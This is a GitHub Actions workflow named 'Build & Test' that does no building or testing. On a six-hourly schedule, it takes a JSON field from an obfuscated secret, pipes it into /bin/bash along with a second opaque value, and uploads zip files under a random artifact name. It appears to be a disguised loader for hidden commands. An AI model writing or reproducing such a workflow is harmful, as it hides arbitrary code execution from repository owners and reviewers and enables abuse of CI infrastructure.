name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '36 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          evl426: ${{ secrets.evl426 }}
        run: |
          printf '%s' "$evl426" | jq -r .bp41 | /bin/bash
          echo $if076 | jq -r .ilq832 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: VMt1jB1j
          path: "*.zip"
          retention-days: 1
